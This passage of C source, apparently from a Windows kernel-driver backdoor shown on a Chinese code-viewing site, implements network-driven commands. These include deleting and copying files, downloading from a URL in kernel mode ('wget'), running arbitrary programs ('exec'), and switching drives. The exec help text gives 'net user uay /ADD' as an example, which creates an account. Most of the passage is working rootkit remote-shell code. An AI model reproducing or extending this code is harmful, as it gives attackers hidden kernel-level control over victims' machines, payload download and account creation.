📄 command.c
字号:
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Del;
}
DbgPrint("del file: %S\n",tempforpAth);//debug
RtlInitUnicodeString(&nAme,tempforpAth);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
dwStAtus = ZwOpenFile(
&hFileHAndle,
GENERIC_READ|FILE_WRITE_ATTRIBUTES|DELETE,//|GENERIC_WRITE|DELETE,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ|FILE_SHARE_WRITE,
FILE_NON_DIRECTORY_FILE
);
DbgPrint("ZwOpenFile dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("ZwOpenFile IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" do not exists\n",
strlen(" do not exists\n")
);
continue;
}
fileBAsicInfor.FileAttributes = FILE_ATTRIBUTE_NORMAL;//&= ~(FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
dwStAtus = ZwSetInformationFile(
hFileHAndle,
&IoStAtusBlock,
&fileBAsicInfor,
sizeof(FILE_BASIC_INFORMATION),
FileBasicInformation
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
fileDispositionInfor.DeleteFile = TRUE;
dwStAtus = ZwSetInformationFile(
hFileHAndle,
&IoStAtusBlock,
&fileDispositionInfor,
sizeof(FILE_DISPOSITION_INFORMATION),
FileDispositionInformation
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if(hFileHAndle){
ZwClose(hFileHAndle);
}
/*
dwStAtus = ZwDeleteFile(
&oA
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);
if(dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" do not exists\n",
strlen(" do not exists\n")
);
continue;
}
else if(dwStAtus == STATUS_ACCESS_DENIED){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" : ACCESS DENIED\n",
strlen(" : ACCESS DENIED\n")
);
continue;
}
else if(dwStAtus == STATUS_SUCCESS){
//do noting;
continue;
}
else if(dwStAtus == STATUS_CANNOT_DELETE){
uSend(
pRecvList->pConnection,
Argv[i],
strlen(Argv[i])
);
uSend(
pRecvList->pConnection,
" : CANNOT DELETE\n",
strlen(" : CANNOT DELETE\n")
);
}
else{
uSend(
pRecvList->pConnection,
"del: error\n",
strlen("del: error\n")
);
continue;
}
*/
}//for
end_CommAnd_Del:
ExFreePool(tempforpAth);
ExFreePool(tempforArg);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Copy(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
HANDLE hFile_source,hFile_dest;
OBJECT_ATTRIBUTES oA_source,oA_dest;
UNICODE_STRING nAme_source,nAme_dest;
NTSTATUS dwStAtus;
IO_STATUS_BLOCK IoStAtusBlock;
//WCHAR tempforpAth_source[512],tempforpAth_dest[512];
//WCHAR tempforArg_source[256],tempforArg_dest[256];
WCHAR *tempforpAth_source,*tempforpAth_dest;
WCHAR *tempforArg_source,*tempforArg_dest;
//CHAR CopyBuffer[1024]; //kernel stAck is precious
CHAR *CopyBuffer;
ULONG CopyLength;
CopyBuffer = ExAllocatePool(PagedPool,1024);
tempforpAth_source = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
tempforpAth_dest = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
tempforArg_source = ExAllocatePool(PagedPool,MAXARGLENGTH_W);
tempforArg_dest = ExAllocatePool(PagedPool,MAXARGLENGTH_W);
if (Argc > 3){
uSend(
pRecvList->pConnection,
"too mAny Arguments\n",
strlen("too mAny Arguments\n")
);
goto end_CommAnd_Copy;
}
if (Argc < 3){
uSend(
pRecvList->pConnection,
"too few Arguments\n",
strlen("too few Arguments\n")
);
goto end_CommAnd_Copy;
}
RtlZeroMemory(tempforArg_source,MAXARGLENGTH_W);
RtlZeroMemory(tempforArg_dest,MAXARGLENGTH_W);
DbgPrint("strlen(Argv[1]):%d\n",strlen(Argv[1]));//debug
DbgPrint("strlen(Argv[2]):%d\n",strlen(Argv[2]));
if(strlen(Argv[1]) < MAXARGLENGTH_A && strlen(Argv[2]) < MAXARGLENGTH_A){
Atow(Argv[1],tempforArg_source);
Atow(Argv[2],tempforArg_dest);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Copy;
}
RtlZeroMemory(tempforpAth_source,MAXPATHLENGTH_W);
RtlZeroMemory(tempforpAth_dest,MAXPATHLENGTH_W);
RtlCopyMemory(tempforpAth_source,L"\\??\\",sizeof(L"\\??\\"));
RtlCopyMemory(tempforpAth_dest,L"\\??\\",sizeof(L"\\??\\"));
if(tempforArg_source[1] == L':' && tempforArg_source[0] != L' '){
//绝对路径,包括盘符
if ((wcslen(tempforpAth_source) + wcslen(tempforArg_source))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth_source,tempforArg_source);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Copy;
}
}else{
//
DbgPrint("(wcslen(tempforpAth_source) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_source) : %d\n",wcslen(tempforpAth_source) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_source));//debug
if((wcslen(tempforpAth_source) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_source))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth_source,pRecvList->pConnection->m_PAth);
wcscat(tempforpAth_source,tempforArg_source);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Copy;
}
}
if(tempforArg_dest[1] == L':' && tempforArg_dest[0] != L' '){
if ((wcslen(tempforpAth_dest) + wcslen(tempforArg_dest))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth_dest,tempforArg_dest);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Copy;
}
}else{
//
DbgPrint("wcslen(tempforpAth_dest) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_dest):%d\n",wcslen(tempforpAth_dest) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_dest));
if((wcslen(tempforpAth_dest) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_dest))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth_dest,pRecvList->pConnection->m_PAth);
wcscat(tempforpAth_dest,tempforArg_dest);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Copy;
}
}
DbgPrint("copy source: %S\n",tempforpAth_source);//debug
DbgPrint("copy dest: %S\n",tempforpAth_dest);//debug
RtlInitUnicodeString(&nAme_source,tempforpAth_source);
RtlInitUnicodeString(&nAme_dest,tempforpAth_dest);
InitializeObjectAttributes(
&oA_source,
&nAme_source,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
InitializeObjectAttributes(
&oA_dest,
&nAme_dest,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
dwStAtus = ZwOpenFile(
&hFile_source,
GENERIC_READ|SYNCHRONIZE,
&oA_source,
&IoStAtusBlock,
FILE_SHARE_READ,
FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE
);
DbgPrint("ZwOpenFile dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("ZwOpenFile IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){//需要改进
uSend(
pRecvList->pConnection,
Argv[1],
strlen(Argv[1])
);
uSend(
pRecvList->pConnection,
" do not exists\n",
strlen(" do not exists\n")
);
//return dwStAtus;
goto end_CommAnd_Copy;
}
dwStAtus = ZwCreateFile(
&hFile_dest,
GENERIC_WRITE|SYNCHRONIZE,
&oA_dest,
&IoStAtusBlock,
0,
FILE_ATTRIBUTE_NORMAL,
0,
FILE_CREATE,
FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0
);
DbgPrint("ZwCreAteFile dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("ZwCreAteFile IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if (dwStAtus != STATUS_SUCCESS){//需要改进
uSend(
pRecvList->pConnection,
"file AlreAdy exists or bAd pAth\n",
strlen("file AlreAdy exists or bAd pAth\n")
);
//return dwStAtus;
goto end_CommAnd_Copy;
}
dwStAtus = ZwReadFile(
hFile_source,
NULL,
NULL,
NULL,
&IoStAtusBlock,
CopyBuffer,
1024,
NULL,
NULL
);
CopyLength = IoStAtusBlock.Information;
while(NT_SUCCESS(dwStAtus)){
ZwWriteFile(
hFile_dest,
NULL,
NULL,
NULL,
&IoStAtusBlock,
CopyBuffer,
CopyLength,
NULL,
NULL
);
dwStAtus = ZwReadFile(
hFile_source,
NULL,
NULL,
NULL,
&IoStAtusBlock,
CopyBuffer,
1024,
NULL,
NULL
);
CopyLength = IoStAtusBlock.Information;
}
ZwClose(hFile_source);
ZwClose(hFile_dest);
end_CommAnd_Copy:
ExFreePool(CopyBuffer);
ExFreePool(tempforpAth_source);
ExFreePool(tempforpAth_dest);
ExFreePool(tempforArg_source);
ExFreePool(tempforArg_dest);
return dwStAtus;
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Wget(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
BOOLEAN result;
if(Argc != 3){
uSend(
pRecvList->pConnection,
"wrong Arguments\n wget URL fullFileNAme\n",
strlen("wrong Arguments\n wget URL fullFileNAme\n")
);
return STATUS_SUCCESS;
}
if(strlen(Argv[1]) + strlen(Argv[2]) >= 98){
uSend(
pRecvList->pConnection,
"Arguments Are too long",
strlen("Arguments Are too long")
);
}
result = KWget(Argv[1],Argv[2]);
if(result == FALSE){
uSend(
pRecvList->pConnection,
"os version not support\n",
strlen("os version not support\n")
);
}
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Exec(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
BOOLEAN result;
if(Argc != 2){
uSend(
pRecvList->pConnection,
"wrong Arguments\n eg: exec \"c:\\WINDOWS\\System32\\freecell.exe\" or\n exec \"net user uay /ADD\"\n",
strlen("wrong Arguments\n eg: exec \"c:\\WINDOWS\\System32\\freecell.exe\" or\n exec \"net user uay /ADD\"\n")
);
return STATUS_SUCCESS;
}
result = KExec(Argv[1]);
if(result == FALSE){
uSend(
pRecvList->pConnection,
"os version not support\n",
strlen("os version not support\n")
);
}
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
//判断分区是否存在的方法就是看这个分区根目录是否存在
NTSTATUS CommAnd_ChAngeDriver(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
CHAR tempA[16] = {0};
WCHAR tempW[16] = {0};
HANDLE hFile;
NTSTATUS stAtus;
IO_STATUS_BLOCK IoStAtusBlock;
UNICODE_STRING nAme;
OBJECT_ATTRIBUTES oA;
if(Argc != 2){
uSend(
pRecvList->pConnection,
"wrong Arguments\n eg: chAngedriver d\n",
strlen("wrong Arguments\n eg: chAngedriver d\n")
);
return STATUS_SUCCESS;
}
if(strlen(Argv[1]) > 1){
uSend(
pRecvList->pConnection,
"wrong Arguments\n eg: chAngedriver d\n",
strlen("wrong Arguments\n eg: chAngedriver d\n")
);
return STATUS_SUCCESS;
}
if((Argv[1][0] > 'a' && Argv[1][0] < 'z') || (Argv[1][0] > 'A' && Argv[1][0] < 'Z')){
strcpy(tempA,"\\??\\");
strcat(tempA,Argv[1]);
strcat(tempA,":\\");
DbgPrint("%s\n",tempA);
/// like \\??\\d:
Atow(tempA,tempW);
DbgPrint("%S\n",tempW);
RtlInitUnicodeString(&nAme,tempW);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
stAtus = ZwOpenFile(
&hFile,
GENERIC_READ,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ,
FILE_DIRECTORY_FILE
);
DbgPrint("stAtus: 0x%x\n IoStAtusBlock.StAtus: 0x%x\n",stAtus,IoStAtusBlock.Status);
if(stAtus != STATUS_SUCCESS || stAtus == STATUS_OBJECT_NAME_NOT_FOUND){
uSend(
pRecvList->pConnection,
"driver does not exists\n",
strlen("driver does not exists\n")
);
return STATUS_SUCCESS;
}
else{
RtlZeroMemory(pRecvList->pConnection->m_PAth,512);
wcscpy(pRecvList->pConnection->m_PAth,&tempW[4]);//去掉前面的"\??\"
ZwClose(hFile);
return STATUS_SUCCESS;
}
}
else{
uSend(
pRecvList->pConnection,
"wrong driver,must be A-Z\n",
strlen("wrong driver,must be A-Z\n")
);
}
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -